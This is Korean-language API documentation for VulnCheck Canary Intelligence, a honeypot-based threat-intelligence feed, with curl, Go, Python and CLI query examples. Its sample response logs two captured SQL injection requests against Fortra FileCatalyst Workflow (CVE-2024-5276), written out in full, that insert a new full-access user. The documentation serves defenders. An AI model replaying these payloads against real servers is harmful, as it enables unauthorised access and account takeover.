VulnCheck Canary Intelligence는 인터넷 전반에 실제 취약한 시스템을 구축하여 실제 공격자의 행동과 악용 기법을 실시간으로 포착합니다. 이 데이터는 어떤 취약점이 표적으로 삼고, 어떻게, 그리고 누가 악용하는지를 보여줍니다. 이를 통해 방어자에게 조기에 실행 가능한 정보를 제공합니다.
VulnCheck API를 사용하면 VulnCheck Canary Intelligence를 쉽게 시작할 수 있습니다. 시작하려면 다음과 같이 /v3/index/:index?cve=:cve API를 통해 vulncheck-canaries 인덱스를 쿼리하기만 하면 됩니다.
curl --request GET \
--url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276 \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
indices_client = vulncheck_sdk.IndicesApi(api_client)
api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276")
print(api_response.data)
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276
위의 예에서는 vulncheck-canaries 인덱스에서 CVE-2024-5276에 대한 정보를 검색합니다.
유효한 CVE 식별자를 사용하여 /v3/index/vulncheck-canaries?cve=:cve API 엔드포인트를 호출하면 아래와 유사한 응답이 반환됩니다.
{
"_benchmark": 0.039542,
"_meta": {
"timestamp": "2025-10-22T11:35:36.982964726Z",
"index": "vulncheck-canaries",
// ...
},
"data": [
{
"src_ip": "34.133.225.171",
"src_port": 58376,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:32:24.338Z"
},
{
"src_ip": "34.16.7.161",
"src_port": 48334,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:17:55.908Z"
}
]
}
VulnCheck Canary Intelligence는 광범위한 사용 사례를 지원합니다.
API 쿼리 매개변수 두 개(CVE와 날짜)를 결합하면 특정 날짜에 악용되고 있는 CVE를 빠르게 파악할 수 있습니다.
curl --request GET \
--url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17 \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Date("2025-10-17").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
indices_client = vulncheck_sdk.IndicesApi(api_client)
api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276", date="2025-10-17")
print(api_response)
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276 --date 2025-10-17
VulnCheck Canary Intelligence를 사용하면 다양한 API 쿼리 매개변수를 사용하여 Canary 데이터 세트를 쉽게 쿼리할 수 있으며, 이는 결과 필터링에 유용합니다. 지원되는 API 쿼리 매개변수는 다음과 같습니다.
| 쿼리 매개변수 | 설명 |
|---|---|
| cve | CVE ID 기반 필터링 |
| src_country | 소스 국가에서 발생한 공격을 기준으로 필터링 |
| dst_country | 운명 국가에 대한 공격을 기준으로 필터링 |
| date | YYYY-MM-DD 형식의 공격 날짜 기반 필터링 |
| src_ip | 공격의 소스 IP 주소 기반 필터링 |
| src_asn | AS12345 형식의 공격 소스 ASN 기반 필터링 |
| 오프라인 백업 | 설명 |
|---|---|
| vulncheck-canaries-3d | 지난 3일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-10d | 지난 10일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-30d | 지난 30일간의 Canary Intelligence 탐지 |
| vulncheck-canaries-90d | 지난 90일간의 Canary Intelligence 탐지 |
특정 오프라인 백업을 요청하려면 다음과 같이 /v3/backup/:index를 호출하기만 하면 됩니다(아래에 vulncheck-canaries-3d가 표시됨).
curl --request GET \
--url https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
func main() {
configuration := vulncheck.NewConfiguration()
configuration.Scheme = "https"
configuration.Host = "api.vulncheck.com"
client := vulncheck.NewAPIClient(configuration)
token := os.Getenv("VULNCHECK_API_TOKEN")
auth := context.WithValue(
context.Background(),
vulncheck.ContextAPIKeys,
map[string]vulncheck.APIKey{
"Bearer": {Key: token},
},
)
resp, httpRes, err := client.EndpointsAPI.BackupIndexGet(auth, "vulncheck-canaries-3d").Execute()
if err != nil || httpRes.StatusCode != 200 {
log.Fatal(err)
}
prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
if err != nil {
log.Fatalf("Failed to generate JSON: %v", err)
return
}
fmt.Println(string(prettyJSON))
}
import vulncheck_sdk
configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
configuration.api_key["Bearer"] = "insert_token_here"
with vulncheck_sdk.ApiClient(configuration) as api_client:
endpoints_client = vulncheck_sdk.EndpointsApi(api_client)
api_response = endpoints_client.backup_index_get("vulncheck-canaries-3d")
print(api_response.data[0].url)
vulncheck backup download vulncheck-canaries-3d